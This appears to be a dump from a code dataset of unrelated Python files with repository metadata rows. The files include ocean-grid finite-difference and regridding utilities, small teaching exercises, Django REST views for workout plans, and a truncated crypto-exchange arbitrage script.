if ma.isMaskedArray(nq):
nq=npy.array(nq,subok=True)
q = nan_to_zero(nq)
a_msk = abs(mask-1)
a_msk = a_msk * msk_value
mq = q * mask
mq+= a_msk
#
return mq
#---------------------------- Grid Swapping ---------------------------------
#- Core swapping utilities
def _gridi2iplus(self,var,mvol):
jpi = self.jpi
mvar = mvol
tabvar = 0.*var#npy.core.ma.masked_equal(0.*var,1)
# newval(i) is (val(i) + val(i+1)) / 2
tabvar[...,0:jpi-1] = mvar[...,0:jpi-1] * var[...,0:jpi-1]\
+ mvar[...,1:jpi] * var[...,1:jpi]
tabvar[...,0:jpi-1]/= mvar[...,0:jpi-1] + mvar[...,1:jpi]
tabvar[...,jpi-1] = var[...,jpi-1]
#
return nan_to_mskval(npy.array(tabvar,subok=True))
def _gridi2iminus(self,var,mvol):
jpi = self.jpi
mvar = mvol
tabvar = 0.*var#npy.core.ma.masked_equal(0.*var,1)
# newval(i) is (val(i-1) + val(i)) / 2
tabvar[...,:,1:jpi] = mvar[...,:,0:jpi-1] * var[...,:,0:jpi-1]\
+ mvar[...,:,1:jpi] * var[...,:,1:jpi]
tabvar[...,1:jpi]/= mvar[...,0:jpi-1] + mvar[...,1:jpi]
tabvar[...,0] = var[...,0]
#
return nan_to_mskval(npy.array(tabvar,subok=True))
def _gridj2jplus(self,var,mvol):
jpj = self.jpj
mvar = mvol
tabvar = 0.*var#npy.core.ma.masked_equal(0.*var,1)
# newval(j) is (val(j) + val(j+1)) / 2
tabvar[...,0:jpj-1,:] = mvar[...,0:jpj-1,:] * var[...,0:jpj-1,:]\
+ mvar[...,1:jpj,:] * var[...,1:jpj,:]
tabvar[...,0:jpj-1,:]/= mvar[...,0:jpj-1,:] + mvar[...,1:jpj,:]
tabvar[...,jpj-1,:] = var[...,jpj-1,:]
return nan_to_mskval(npy.array(tabvar,subok=True))
def _gridj2jminus(self,var,mvol):
jpj = self.jpj
mvar = mvol
tabvar = 0.*var#npy.core.ma.masked_equal(0*var,1)
# newval(j) is (val(j-1) + val(j)) / 2
tabvar[...,1:jpj,:] = mvar[...,0:jpj-1,:] * var[...,0:jpj-1,:]\
+ mvar[...,1:jpj,:] * var[...,1:jpj,:]
tabvar[...,1:jpj,:]/= mvar[...,0:jpj-1,:] + mvar[...,1:jpj,:]
tabvar[...,0,:] = var[...,0,:]
return nan_to_mskval(npy.array(tabvar,subok=True))
def _grid_2_grid_iright_jleft(self,var,mvol,mask):
var1 = self._gridi2iplus(var,mvol)
mvol1 = self._gridi2iplus(mvol,mask)
var2 = self._gridj2jminus(var1,mvol1)
return var2
def _grid_2_grid_ileft_jright(self,var,mvol,mask):
var1 = self._gridi2iminus(var,mvol)
mvol1 = self._gridi2iminus(mvol,mask)
var2 = self._gridj2jplus(var1,mvol1)
return var2
#- User swapping utilities
def gridf_2_gridT(self,w):
"""Return w (gridf) on gridT
"""
mvol = self.f_surf
msk = self.fmask
w1 = self._gridj2jminus(w,mvol)
mvol1 = self._gridj2jminus(mvol,msk)
w2 = self._gridi2iminus(w1,mvol1)
return w2
def gridV_2_gridU(self,v):
return self._grid_2_grid_iright_jleft(v,self.v_surf,self.vmask)
def gridU_2_gridV(self,u):
return self._grid_2_grid_ileft_jright(u,self.u_surf,self.umask)
def gridT_2_gridV(self,v):
"""Return v (gridT) on gridV."""
return self._gridj2jplus(v,self.t_surf)
def gridT_2_gridU(self,u):
"""Return u (gridT) on gridU."""
return self._gridi2iplus(u,self.t_surf)
def gridU_2_gridT(self,u):
"""Return u (gridU) on gridT
"""
return self._gridi2iminus(u,self.u_surf)
def gridV_2_gridT(self,v):
"""Return v (gridV) on gridT
"""
return self._gridj2jminus(v,self.v_surf)
#---------------------------- Vector Operators -----------------------------------
def lamV(self,lam,V):
"""
Return lambda * V.
input
-lam : T-grid
-V : U,V,W grid
output
-lamV : U,V,W grid
"""
lamx = self.gridT_2_gridU(lam)
lamVx = lamx * V[0]
lamy = self.gridT_2_gridV(lam)
lamVy = lamy * V[1]
return lamVx,lamVy
def dot(self,a,b,stag_grd=False):
"""
Return the dot product a.b.
-----------------------------
input :
ax,bx : grid U
ax,by : grid V
output :
p : grid T
"""
#
ma1 = self.gridU_2_gridT(a[0])
mb1 = self.gridU_2_gridT(b[0])
ma2 = self.gridV_2_gridT(a[1])
mb2 = self.gridV_2_gridT(b[1])
p = ma1 * mb1 + ma2 * mb2
return p
#---------------------------- Finite Differences ---------------------------------
def d_i(self,q,partial_steps=None):
"""Return difference q(i+1)-q(i)
"""
jpi=self.jpi
di= q[...,1:jpi]-q[...,0:jpi-1]
return di
def d_j(self,q,partial_steps=None):
"""Return difference q(j+1)-q(j)
"""
jpj=self.jpj
dj=q[...,1:jpj,:]-q[...,0:jpj-1,:]
return dj
def m_i(self,q):
"""Return the average of q(i+1) and q(i)
"""
#
jpi=self.jpi
mi= q[...,1:jpi]+q[...,0:jpi-1]
mi/=2.
return mi
def m_j(self,q):
"""Return the average of q(j+1) and q(j)
"""
#
jpj=self.jpj
mj=q[...,1:jpj,:]+q[...,0:jpj-1,:]
mj/=2.
return mj
def setBC(self,q,axis,lim,msk_value=1E20):
"""Extends an array to fit the initial grid."""
        BC_shape = npy.array(q.shape, dtype=npy.int64) # shape entries must stay integers for N.ones below
if axis=='i':
nax=-1
elif axis=='j':
nax=-2
elif axis=='k':
nax=-3
#
BC_shape[nax] = 1
BC = N.ones(BC_shape) * msk_value
#
if lim==-1:
new_q=npy.concatenate((q,BC),axis=nax)
elif lim==1:
new_q=npy.concatenate((BC,q),axis=nax)
#
return new_q
def grad(self,q,masked=False):
"""
Return the 2D gradient of a scalar field.
input : on T grid
output : on U,V grid
"""
#
jpj,jpi = self.shape
#
gx=self.d_i(q)
gx/=self.e1u[:,0:jpi-1]
#
gy=self.d_j(q)
gy/=self.e2v[0:jpj-1,:]
#
Bgx=self.setBC(gx,'i',-1)
Bgy=self.setBC(gy,'j',-1)
#
if masked:
Bgx=self.set_mask(Bgx,self.umask)
Bgy=self.set_mask(Bgy,self.vmask)
return Bgx,Bgy
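    # Illustrative note (added): for a T-point scalar q,
    #   gx, gy = grd.grad(q)
    # gives dq/dx at U-points and dq/dy at V-points, with the trailing
    # column/row padded by setBC.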
def matrixgradient(self,u,v,masked=False):
"""Return the 2d tensor of the gradient of a vector field.
ux,vy : at t-points
uy,vx : at f-points
"""
jpj,jpi = self.shape
ux = self.d_i(self.e2u * u)[...,:,:] / (self.e1t*self.e2t)[...,:,1:jpi]
ux = self.setBC(ux,'i',-1) # t-point
vy = self.d_j(self.e1v * v)[...,:,:] / (self.e1t*self.e2t)[...,1:jpj,:]
vy = self.setBC(vy,'j',-1) # t-point
uy = self.d_j(self.e1u * u)[...,:,:] / (self.e1f*self.e2f)[...,0:jpj-1,:]
uy = self.setBC(uy,'j',-1) # f-point
vx = self.d_i(self.e2v * v)[...,:,:] / (self.e1f*self.e2f)[...,:,0:jpi-1]
vx = self.setBC(vx,'i',-1) # f-point
if masked:
ux = self.set_mask(ux,self.tmask)
vy = self.set_mask(vy,self.tmask)
vx = self.set_mask(vx,self.fmask)
uy = self.set_mask(uy,self.fmask)
return {'ux':ux,'vy':vy,'uy':uy,'vx':vx}
def curl(self,a,masked=False):
"""Return the vertical component of the curl of a vector field.
"""
#
a1 = a[0]
a2 = a[1]
#
jpi = self.jpi
jpj = self.jpj
#
cz = ( self.d_i(self.e2v*a2)[...,0:jpj-1,:]\
- self.d_j(self.e1u*a1)[...,:,0:jpi-1] )
cz/= (self.e1f*self.e2f)[...,0:jpj-1,0:jpi-1]
#
Bcz = self.setBC(self.setBC(cz,'i',-1),'j',-1)
#
if masked:
Bcz = self.set_mask(Bcz,self.fmask)
return Bcz
def div(self,a,masked=False):
"""
Return the 2D divergence of a vector field.
input : grid U,V
output : grid T
"""
#
a1=a[0]
a2=a[1]
#
jpi=self.jpi
jpj=self.jpj
#
d=self.d_i(self.e2u*a1)[...,1:jpj,:]+self.d_j(self.e1v*a2)[...,:,1:jpi]
d/=(self.e1t*self.e2t)[...,1:jpj,1:jpi]
#
Bd=self.setBC(self.setBC(d,'i',1),'j',1)
#
if masked:
Bd = self.set_mask(Bd,self.tmask)
#
return Bd
def shear_strain(self,a,masked=False):
"""Return the rate of shear strain r = vx + uy on the f-grid.
"""
a1=a[0]
a2=a[1]
#
jpi=self.jpi
jpj=self.jpj
#
r = ( self.d_i(self.e2v*a2)[...,0:jpj-1,:]\
+ self.d_j(self.e1u*a1)[...,:,0:jpi-1] )
r/= (self.e1f*self.e2f)[...,0:jpj-1,0:jpi-1]
#
Br = self.setBC(self.setBC(r,'i',-1),'j',-1)
if masked:
Br = self.set_mask(Br,self.fmask)
return Br
def normal_strain(self,uv,masked=False):
"""Return the normal rate of strain a = ux - vy on the T-grid.
"""
u=uv[0]
v=uv[1]
#
jpi=self.jpi
jpj=self.jpj
#
a = self.d_i(self.e2u*u)[...,1:jpj,:] - self.d_j(self.e1v*v)[...,:,1:jpi]
a/=(self.e1t*self.e2t)[...,1:jpj,1:jpi]
Ba = self.setBC(self.setBC(a,'i',1),'j',1)
if masked:
Ba = self.set_mask(Ba,self.tmask)
return Ba
def ssh2uv(self,ssh):
"""Return u,v from sea surfac height on the grid
"""
self._get_corio()
hx,hy = self.grad(ssh)
gf_u = grav / self.corio_u
gf_u[npy.where(npy.abs(self.gphiu)<5.)] = 0
gf_v = grav / self.corio_v
gf_v[npy.where(npy.abs(self.gphiv)<5.)] = 0
u = - gf_u * self.gridV_2_gridU(hy)
v = gf_v * self.gridU_2_gridV(hx)
return u,v
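    # Hypothetical usage sketch (added, not in the original): geostrophic
    # currents from a sea surface height field on this grid; the factor g/f is
    # zeroed within 5 degrees of the equator, so u and v vanish there.
    #   grd = grid2D(navlon=lon, navlat=lat, mask=mask)
    #   u, v = grd.ssh2uv(ssh)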
#------------------------ Specific Grids------------------------------------
def gridAVISO_onethird():
"""Return a grid object corresponding to AVISO 1/3 global MERCATOR grid.
"""
import IoData
lat,lon = IoData.getAVISOlatlon()
grd = grid2D(navlon=lon,navlat=lat)
return grd
def gridAVISO_qd():
"""Return a grid object corresponding to AVISO 1/3 global qd grid.
"""
import IoData
lat,lon = IoData.getAVISOlatlon_qd()
grd = grid2D(navlon=lon,navlat=lat)
return grd
def gridNOAA_onequarter():
"""Return a grid object corresponding to NCDC/NOAA 1/4 global grid.
"""
import IoData
lat,lon,mask = IoData.getNOAAlatlonmask()
grd = grid2D(navlon=lon,navlat=lat,mask=mask)
return grd
#====================== Interpolation ======================================
class stdRegridder:
"""bilinear interpolation with basemap.interp. assumes the grid is rectangular.
"""
def __init__(self,xin=None,yin=None,xout=None,yout=None,method='basemap'):
self.xin = xin[0,:]
self.yin = yin[:,0]
self.xout = xout
self.yout = yout
self.method = method
def __call__(self,array):
masked = ma.is_masked(array)
        if self.method == 'basemap':
            from mpl_toolkits import basemap # deferred import: only this branch needs the basemap toolkit
            return basemap.interp(array, self.xin, self.yin, self.xout, self.yout, checkbounds=False, masked=masked, order=1)
        elif self.method == 'scipy':
import scipy.interpolate
interp = scipy.interpolate.interp2d(self.xin, self.yin, array, kind='linear')
a1d = interp(self.xout[0,:],self.yout[:,0])
return npy.reshape(a1d,self.yout.shape)
def grdRegridder(grdin=None,grdout=None,grdintype='t',grdouttype='t'):
"""Return a regridder based on grd instances.
"""
xin = eval('grdin.glam' + grdintype)
yin = eval('grdin.gphi' + grdintype)
xout = eval('grdout.glam' + grdouttype)
yout = eval('grdout.gphi' + grdouttype)
return stdRegridder(xin=xin,yin=yin,xout=xout,yout=yout)
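# Hypothetical usage sketch (added): bilinear regridding of a T-point field
# between two grid2D instances.
#   regrid = grdRegridder(grdin=grd_src, grdout=grd_dst, grdintype='t', grdouttype='t')
#   field_dst = regrid(field_src)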
#====================== Coarsening ======================================
def boxcar_factor_test(array2D,icrs=3,jcrs=3):
"""Test whether the shape of array2D is suited to coarsening with icrs,jcrs
"""
jpj, jpi = array2D.shape
if jpj%jcrs==0 and jpi%icrs==0:
return True
else:
return False
def boxcar_reshape(array2D,icrs=3,jcrs=3):
"""Return a 3D array where values in boxes added in extra dimensions
"""
if not(boxcar_factor_test(array2D,icrs=icrs,jcrs=jcrs)):
print("shape and coarsening factors are not compatible")
return
jpj, jpi = array2D.shape
# target shape is shape = (jcrs, icrs, jpj/jcrs, jpi/icrs)
t = np.reshape(array2D,(jpj,-1,icrs)) # (jpj, jpi/icrs, icrs)
    tt = t.swapaxes(0,2) # (icrs, jpi/icrs, jpj)
ttt = np.reshape(tt,(icrs,jpi//icrs,-1,jcrs)) # (icrs,jpi/icrs,jpj/jcrs, jcrs)
tttt = ttt.swapaxes(1,3) # (icrs,jcrs,jpj/jcrs, jpi/icrs)
ttttt = tttt.swapaxes(0,1) # (jcrs,icrs,jpj/jcrs, jpi/icrs)
return ttttt
def boxcar_ravel(array2D,icrs=3,jcrs=3):
"""Return a 3D array where values in boxes are broadcasted along the third axis.
output shape is (icrs*jcrs,jpj_crs,jpi_csr)
"""
if not(boxcar_factor_test(array2D,icrs=icrs,jcrs=jcrs)):
print("shape and coarsening factors are not compatible")
return
reshaped = boxcar_reshape(array2D,icrs=icrs,jcrs=jcrs)
dum,dum,jpj,jpi = reshaped.shape
raveled = reshaped.reshape((icrs*jcrs,jpj,jpi))
return raveled
def boxcar_deep_ravel(array2D,icrs=3,jcrs=3):
"""Return a 3D array are
output shape is (jpj_crs*jpi_csr,jcrs,icrs)
"""
if not(boxcar_factor_test(array2D,icrs=icrs,jcrs=jcrs)):
print("shape and coarsening factors are not compatible")
return
reshaped = boxcar_reshape(array2D,icrs=icrs,jcrs=jcrs)
dum,dum,jpj,jpi = reshaped.shape
deep_raveled = reshaped.reshape((jcrs,icrs,jpj*jpi))
deep_raveled = np.rollaxis(deep_raveled,2)
return deep_raveled
def boxcar_sum(array2D,icrs=3,jcrs=3):
"""Return an array with values corresponding to sums of array2D within boxes.
"""
if not(boxcar_factor_test(array2D,icrs=icrs,jcrs=jcrs)):
print("shape and coarsening factors are not compatible")
return
    # the coarse result has shape (jpj // jcrs, jpi // icrs)
sum_array = boxcar_ravel(array2D,icrs=icrs,jcrs=jcrs).sum(axis=0)
return sum_array
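def _boxcar_sum_demo():
    """Hypothetical usage sketch (added, not in the original module): summing
    3x3 boxes of a 6x6 array gives a 2x2 array of box totals."""
    a = npy.arange(36, dtype=dfloat).reshape(6, 6)
    crs = boxcar_sum(a, icrs=3, jcrs=3)
    assert crs.shape == (2, 2)
    return crs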
class grdCoarsener:
"""Return a method that implements coarsening for a given input grid.
"""
def __init__(self,grdin,x_offset=0,y_offset=0,crs_factor=3):
# loading
self.fine_grid = grdin
self.x_offset = x_offset
self.y_offset = y_offset
self.crs_factor = crs_factor
        self.fine_shape = grdin.shape
# indices
jpj,jpi = self.fine_shape
jcrs, icrs = crs_factor, crs_factor
jsize = jpj - (jpj - y_offset) % jcrs #- y_offset
isize = jpi - (jpi - x_offset) % icrs #- x_offset
        self.crs_shape = ((jsize - y_offset) // jcrs, (isize - x_offset) // icrs)
self.cut_array = lambda array2D:array2D[...,y_offset:jsize,x_offset:isize]
self.weights = self.cut_array(self.fine_grid.t_surf)
self.crs_area = boxcar_sum(self.weights,icrs=self.crs_factor,jcrs=self.crs_factor)
self.crs_shape = self.crs_area.shape
def __call__(self,array2D):
cut_array2D = self.cut_array(array2D)
bxc = lambda a:boxcar_sum(a,icrs=self.crs_factor,jcrs=self.crs_factor)
return bxc(cut_array2D * self.weights) / self.crs_area
def return_ravel(self,array2D):
cut_array2D = self.cut_array(array2D)
rvl = lambda a:boxcar_ravel(a,icrs=self.crs_factor,jcrs=self.crs_factor)
return rvl(cut_array2D)
def return_deep_ravel(self,array2D):
        # inverse operation: reshape back with reshape(array2D.shape)
cut_array2D = self.cut_array(array2D)
rvl = lambda a:boxcar_deep_ravel(a,icrs=self.crs_factor,jcrs=self.crs_factor)
return rvl(cut_array2D)
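def _grd_coarsener_demo(grd):
    """Hypothetical usage sketch (added): area-weighted 3x3 coarsening of a
    T-point field on a grid2D instance `grd`."""
    crs = grdCoarsener(grd, crs_factor=3)
    field = npy.ones(grd.shape, dtype=dfloat)
    # the weighted box average of a constant field is the constant itself
    return crs(field)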
#====================== Coriolis ===========================================
def corio(dom,grid='t'):
"""Return Coriolis parameter.
"""
    lat = getattr(dom, 'gphi' + grid)
f = 2.*omega*npy.sin(lat*deg2rad)
return f
def beta(dom,grid='t'):
"""Return planetary beta.
"""
    lat = getattr(dom, 'gphi' + grid)
beta = 2.*omega*npy.cos(lat*deg2rad) / earthrad
return beta
#====================== Miscellaneous ======================================
def nan_to_zero(gz,max_val=1E20):
"""."""
cgz = numpy.nan_to_num(gz)
cgz[numpy.where(numpy.abs(cgz)>=max_val)]=0
return cgz
def nan_to_mskval(gz,mskval=1.E20):
tmp = -9E9*npy.pi
lgz = gz.copy()
lgz[npy.where(lgz==0.)]=tmp
lgz = npy.nan_to_num(lgz)
lgz[npy.where(lgz==0.)]=mskval
lgz[npy.where(lgz==tmp)]=0.
return lgz
#==================
# from http://wiki.scipy.org/Cookbook/SignalSmooth
def gauss_kern(size, sizey=None):
""" Returns a normalized 2D gauss kernel array for convolutions """
from pylab import mgrid
from numpy import exp
size = int(size)
if not sizey:
sizey = size
else:
sizey = int(sizey)
x, y = mgrid[-size:size+1, -sizey:sizey+1]
g = exp(-(x**2/float(size)+y**2/float(sizey)))
return g / g.sum()
def blur_image(im, n, ny=None) :
""" blurs the image by convolving with a gaussian kernel of typical
size n. The optional keyword argument ny allows for a different
size in the y direction.
"""
from scipy import signal
g = gauss_kern(n, sizey=ny)
improc = signal.convolve(im,g, mode='same')
return(improc)
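def _blur_image_demo():
    """Hypothetical usage sketch (added): smooth a noisy 2D field with a
    Gaussian kernel of typical size 3."""
    noisy = npy.random.randn(64, 64)
    return blur_image(noisy, 3)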
| [
"[email protected]"
] | |
20e8763d4c550eaf3adde13df6802f816d95608e | d6806adbc43ce2b53b00e4c99f196fb325db0bda | /mailprinter/core/config.py | 20599e6893a76dcc2d9eedf9fd2fde23f622e7e3 | [
"MIT"
] | permissive | AbhyudayaSharma/MailPrinter | b4e5e4f78052e11e344aa85f8c2115d014a44646 | d80c4a60f82b62f832af95f7b0e4fc025897fbd2 | refs/heads/master | 2020-04-12T02:17:22.408509 | 2019-03-13T12:10:22 | 2019-03-13T12:10:22 | 162,244,471 | 6 | 2 | null | null | null | null | UTF-8 | Python | false | false | 277 | py | import json
import sys
def get_config():
with open('config.json', 'r') as f:
try:
data = json.load(f)
return data
except Exception:
print('Invalid configuration detected!', file=sys.stderr)
sys.exit(-1)
| [
"[email protected]"
] | |
fcb2204485c65ca6cb13e7aaa58aaeec0ba17c73 | cceba07bf7c2446f49037560fb27350e11480844 | /classes/herencia_multiple/triangulo.py | 7d0b7e305f7cf4ec0563c8e5f838216a06f27bc2 | [] | no_license | AcxelMorales/Learn-Python | a1761ba1a218fe13919bd6119f7801d1c0463812 | 83cb820ae9db4a18f885a56dcc3a4ec5ac71b0f6 | refs/heads/master | 2022-10-23T23:04:27.768234 | 2020-06-10T19:18:45 | 2020-06-10T19:18:45 | 270,060,397 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 655 | py | from classes.herencia_multiple.color import Color
from classes.herencia_multiple.figura_geo import FiguraGeometrica
class Triangulo(FiguraGeometrica, Color):
def __init__(self, base, altura, color):
self.__base = base
self.__altura = altura
FiguraGeometrica.__init__(self, base, altura)
Color.__init__(self, color)
def get_base(self):
return self.__base
def set_base(self, base):
self.__base = base
def get_altura(self):
return self.__altura
def set_altura(self, altura):
self.__altura = altura
def area(self):
return (self.__base * self.__altura) / 2
| [
"[email protected]"
] | |
e214d27909581df309eb841f8dc0101a45ec01f0 | 3f73663c0949cab0d840de2e3f001cb98c236ee5 | /30-Days-of-Code/day-06.py | 4eef100d0b7fc5299962c9d925137ebbfadb82b0 | [] | no_license | aditya2082/HackerRank-Solution-in-Python | 0dcd231a5b5fcb1174039b484a58ebb94871ef0b | bef64ad8d342d32e23190ed15d0a4beab9e450cc | refs/heads/master | 2022-06-29T09:30:38.776469 | 2020-05-13T22:25:33 | 2020-05-13T22:25:33 | 263,752,680 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 683 | py | """
Task
Given a string, S, of length N that is indexed from 0 to N-1, print its even-indexed and odd-indexed characters as 2 space-separated
strings on a single line (see the Sample below for more detail).
Note: 0 is considered to be an even index.
Input Format
The first line contains an integer, T (the number of test cases).
Each line i of the T subsequent lines contain a String, S.
Output Format
For each String S<j> (where 0<=j<=T-1), print S<j>'s even-indexed characters, followed by a space, followed by S<j>'s odd-indexed characters.
Sample Input
2
Hacker
Rank
Sample Output
Hce akr
Rn ak
"""
for _ in range(int(input())):
s = input()
print(s[0::2],s[1::2])
| [
"[email protected]"
] | |
144fa1cbba693de8b826e0041cd05a98c94b0874 | 4ee1d690aee51b13091cb2397bcad8254da446f1 | /fontproperty.py | 498efd5145b694ca01b410ec7c0490554f4d5ad7 | [] | no_license | xyl576807077/BackgroundRemove | 4a80752e09d6e3791f22e726cd4eef0154ec1216 | c6df04e764b3fd172caf89a90e53e1da62c077a7 | refs/heads/master | 2020-03-09T23:06:35.023744 | 2018-05-16T02:52:52 | 2018-05-16T02:52:52 | 129,051,132 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 620 | py | from PIL import ImageFont, Image
import json
import numpy
class Fontproperty:
def __init__(self, simplifychinese, traditionchinese,english,symbol):
with open(simplifychinese, 'r') as f:
self.simplifychinese = json.load(f)
with open(traditionchinese, 'r') as f:
self.traditionchinese = json.load(f)
with open(english, 'r') as f:
self.english = json.load(f)
with open(symbol, 'r') as f:
self.symbol = json.load(f)
def __call__(self, text, font_size):
pass
def choose_font(self, text):
pass | [
"[email protected]"
] | |
5f29564bb01514fd2cfc87dcb2dc4271c041b9b9 | f6f53f6f818e3c6be42ef801348b095e86e27669 | /Tutorial 24/classes_with_methods.py | 20cc17e4a0f056a553190f72a924f11e02bab7fd | [] | no_license | Loliloltrop/YouTube | f6b3cccf8c8fbcd699e0ff21225c411803818310 | caccbb61975ec075429c87963708452548281c31 | refs/heads/master | 2023-06-18T17:27:26.514556 | 2021-07-17T15:36:20 | 2021-07-17T15:36:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 499 | py | class student:
def __init__(self,name,grade,gpa):
self.name = name
self.grade = grade
self.gpa = gpa
def honors(self):
if (self.gpa >= 4.0):
return "Highest Honors"
elif (self.gpa >= 3.75):
return "High Honors"
elif (self.gpa >= 3.5):
return "Honors"
else:
return None
student1 = student("Eli",12,4.32)
student2 = student("Emilo",11,3.96)
#print(student1.name)
#print(student2.honors())
| [
"[email protected]"
] | |
ab7c4c3236c6145f24bd63e0157741f814de1832 | 6c14c1ed66e14fb86a01d87265f45ff0056e5b10 | /python/lsst/ctrl/stats/records/generic.py | 7e63c1ad9bf898a539ea22a75bb53ca063574f09 | [] | no_license | jonathansick-shadow/ctrl_stats | ba345f71a3e6df6b4b44cac9cb67bb86c25bfe52 | 88c633477651039cb18a9bf5c30316b8545c4bcd | refs/heads/master | 2021-01-12T12:02:59.321515 | 2016-02-02T19:23:27 | 2016-02-02T19:23:27 | 45,875,277 | 0 | 0 | null | 2015-11-09T23:59:16 | 2015-11-09T23:59:16 | null | UTF-8 | Python | false | false | 1,275 | py | #
# LSST Data Management System
# Copyright 2008-2012 LSST Corporation.
#
# This product includes software developed by the
# LSST Project (http://www.lsst.org/).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the LSST License Statement and
# the GNU General Public License along with this program. If not,
# see <http://www.lsstcorp.org/LegalNotices/>.
#
from record import Record
class Generic(Record):
"""
Generic log event
Listed in documention as not used, but here for completeness.
"""
def __init__(self, year, lines):
"""
Constructor
@param year - the year to tag the job with
@param lines - the strings making up this record
"""
Record.__init__(self, year, lines)
eventClass = Generic
eventCode = "008"
| [
"[email protected]"
] | |
5bd49bf0df1d788a908f29a26c2da3822e667908 | f3094f80d18015dc84f2da56cd0903bdfd04e9cc | /workouts/plans_api.py | 2debd6da72fe7cabf9950cb52d010c5c05cd9fd4 | [] | no_license | RDK90/lift_app | a18fb572bad6c0c121f168c588ac2ddfb60f7de8 | 6d44cd53861b516b1cbcfec28f4dd6cfefff4326 | refs/heads/development | 2021-06-18T20:00:28.653254 | 2021-03-21T17:45:07 | 2021-03-21T17:45:07 | 184,144,218 | 1 | 0 | null | 2021-03-18T18:32:44 | 2019-04-29T21:06:08 | Python | UTF-8 | Python | false | false | 2,700 | py | from rest_framework import status
from rest_framework.decorators import api_view
from rest_framework.response import Response
from rest_framework.views import APIView
from workouts.api_support import *
from .models import Profile, PlanVersionTwo, Plan
from .serializers import PlanSerializer
@api_view(['GET'])
def all_plans(request):
if request.method == "GET":
workouts = Plan.objects.all()
plan_serializer = PlanSerializer(workouts, many=True)
response_data = [{"date":"", "workout":[]}]
index = 0
for plan in plan_serializer.data:
date = plan.pop("date")
if response_data[index]["date"] == "" or response_data[index]["date"] != date:
response_data.append({"date":date, "workout":[plan]})
index = index + 1
else:
response_data[index]["workout"].append(plan)
response_data.pop(0)
return Response(response_data)
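# Illustrative response shape for all_plans (hypothetical field names, since the
# serializer's fields are defined elsewhere in this repo):
# [
#   {"date": "2019-01-01", "workout": [{"exercise": "Squat", "sets": 5}, ...]},
#   {"date": "2019-01-03", "workout": [...]},
# ]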
@api_view(['GET','PUT', 'POST', 'DELETE'])
def plans_by_date(request, date):
date = format_date(date)
try:
workouts = Plan.objects.filter(date=date).values()
except:
return Response(status=status.HTTP_400_BAD_REQUEST)
if request.method == "GET":
if not workouts:
content = {"Error message": "No plan for date {} found".format(date)}
return Response(content, status=status.HTTP_404_NOT_FOUND)
else:
plan_serializer = PlanSerializer(workouts, many=True)
for plans in plan_serializer.data:
plans.pop("date")
return Response({"date":date, "plan": plan_serializer.data})
if request.method == "PUT" or request.method == "POST":
return put_post_workouts_by_id_response(request)
if request.method == "DELETE":
plan = Plan.objects.filter(date=date)
plan.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
@api_view(['GET'])
def all_plans_version_two(request):
if request.method == "GET":
profile_user = Profile.objects.get(user=request.user)
workouts = PlanVersionTwo.objects.filter(user=profile_user)
plan_serializer = PlanSerializer(workouts, many=True)
response_data = [{"date":"", "workout":[]}]
index = 0
for plan in plan_serializer.data:
date = plan.pop("date")
if response_data[index]["date"] == "" or response_data[index]["date"] != date:
response_data.append({"date":date, "workout":[plan]})
index = index + 1
else:
response_data[index]["workout"].append(plan)
response_data.pop(0)
return Response(response_data) | [
"[email protected]"
] | |
49e906ecd28d07f5e8286c16fd8a21a5e83f2e9b | 4c8c618535998d5aba5bdd365a95fc94aa8a90b9 | /twitchanalysis/__init__.py | 2302d36eb1c8e934f2389be70cef46e705f06f27 | [
"MIT"
] | permissive | Muddy91/TwitchAnalysis | d4429a5ee70cd7a76ceb9a932f9181225fe775f8 | c5b61412928e2e92b5b41a5a4d8e1fca54d3365a | refs/heads/master | 2020-03-27T11:10:23.590654 | 2017-11-28T02:22:07 | 2017-11-28T02:22:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23 | py | __all__ = [
'main'
]
| [
"[email protected]"
] | |
52103ab2e3d54d3f7803764e783d2d6f99f5ea25 | 11cef88c061c5e94bb135a981aa74f674c17377d | /crash-course/unit10/exception/alice.py | fd47bc40f7785ac5da27c0d4feab9fad2a4f9010 | [] | no_license | aqing1987/python101 | 77f1a1d405f38aeaeff3ad469277ba79e11b5b96 | 534afe55ed4447f63bc625cc17a6832a46b19f56 | refs/heads/master | 2020-09-17T01:57:18.008387 | 2020-08-10T13:18:04 | 2020-08-10T13:18:04 | 223,954,062 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 96 | py | filename = 'alice1.txt' # not exist
with open(filename) as f_obj:
contents = f_obj.read()
| [
"[email protected]"
] | |
2cd727d2644671964201a7611979c86d6ff66adf | ad113ffed76e72ed0a881a7a6d6a74ea9021e5bf | /compare.py | 74efd55a7fb781291d78599eebebe9112337dc54 | [] | no_license | biletboh/bitexchange | 03c0bfc04e2f103928c173f014a75b6ceea0def9 | 8d541d6bb82f5e3ff4c71cb65b609503ba6b9417 | refs/heads/master | 2021-01-22T10:46:46.717291 | 2017-05-30T14:43:37 | 2017-05-30T14:43:37 | 92,656,591 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,907 | py | import time
def compare_exchange(tradeclient, tradeclient2, bitfinex, exmo):
""" Compare exchange rates at bitfinex and ___
Buy bitcoins at the exchange with lower rates.
Sell bitcoins at the exchange with higher rates.
"""
# Check if the difference between rates is higher than 1.5%
# Case 1: second exchange is cheaper than first
if (float(bitfinex[1])-float(exmo[0]))*100/float(bitfinex[1]) > 1.5:
# Buy bitcoins at exmo
buy_order = tradeclient2.place_order('BTC_USD', 1, exmo[0], 'buy')
# Get bitcoin deposit address at bitfinex
deposit_btc_bitfinex = tradeclient.deposit_btc('bitcoin', 'exchange', renew=0)
# Withdraw bitcoins from exmo to bitfinex
while True:
if isinstance(buy_order, str): # Check for error messages
print('Error Message: ', buy_order)
else:
order_id=buy_order['order_id']
try:
status_order = tradeclient2.open_orders(order_id)
except:
print('Error Message: Provide valid order id for a withdrawal.')
break
if status_order['remaining_amount'] == 0:
if deposit_btc_bitfinex:
